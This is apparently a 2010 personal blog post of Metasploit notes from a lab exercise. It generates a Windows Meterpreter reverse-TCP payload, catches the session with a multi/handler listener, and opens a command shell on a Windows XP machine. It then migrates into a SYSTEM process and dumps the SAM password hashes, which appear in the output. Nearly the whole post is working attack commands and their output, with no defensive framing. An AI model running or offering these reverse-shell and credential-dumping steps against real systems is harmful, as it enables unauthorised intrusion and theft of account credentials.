2010
02.08

Self Meterpreter Notes:

Category: Main / Tag:  / Comments Off

Using the new hashdump from HD MOORE thanks to pauldotcom:
msfpayload windows/meterpreter/reverse_tcp LHOST=d.d.d.d LPORT=d x > test.exe

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST d.d.d.d
LHOST => d.d.d.d
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[*] Starting the payload handler...
[*] Started reverse handler on port d

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (d.d.d.d:d -> d.d.d.d:49595)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXPLAB01
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: WINXPLAB01\labuser
meterpreter > shell
Process 1088 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\labuser\Desktop>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
labuser
The command completed successfully.
C:\Documents and Settings\labuser\Desktop>exit

meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578:::
labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a:::
meterpreter >

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter >

/*migrate to a SYSTEM pid*/
meterpreter > migrate 1040
[*] Migrating to 1040...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...